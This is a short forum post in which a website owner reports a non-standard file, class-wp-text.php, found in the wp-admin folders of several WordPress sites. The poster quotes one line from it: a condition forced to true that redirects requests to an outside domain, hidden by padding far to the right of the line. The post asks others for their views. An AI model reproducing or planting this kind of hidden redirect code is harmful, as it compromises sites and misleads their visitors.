I have found this file on several of our websites:
wp-admin/includes/class-wp-text.php
Nice innocuous name, but not part of the original wordpress installation.
The file date never matches the other files. Waaaaaay far to the right on line 52 we find a dead giveaway (all of line 52 pasted below):
******************************************************
if ( true /*!preg_match('/404/', $req_uri_orig) && !preg_match('/\/administrator\//', $req_uri_orig) && !preg_match('/\/bin\//', $req_uri_orig) && !preg_match('/\/cache\//', $req_uri_orig) && !preg_match('/\/cli\//', $req_uri_orig) && !preg_match('/\/components\//', $req_uri_orig) && !preg_match('/\/installation\//', $req_uri_orig) && !preg_match('/\/layouts\//', $req_uri_orig) && !preg_match('/\/libraries\//', $req_uri_orig) && !preg_match('/\/logs\//', $req_uri_orig) && !preg_match('/\/plugins\//', $req_uri_orig) && !preg_match('/\/tmp\//', $req_uri_orig) && !preg_match('/\/wp-login/', $req_uri_orig) && !preg_match('/\/xmlrpc/', $req_uri_orig) && !preg_match('/\/wp-admin/', $req_uri_orig) && !preg_match('/\/trackback/', $req_uri_orig)*/) $req_uri = 'topbarbietoys.com/';
************************************************
Thoughts?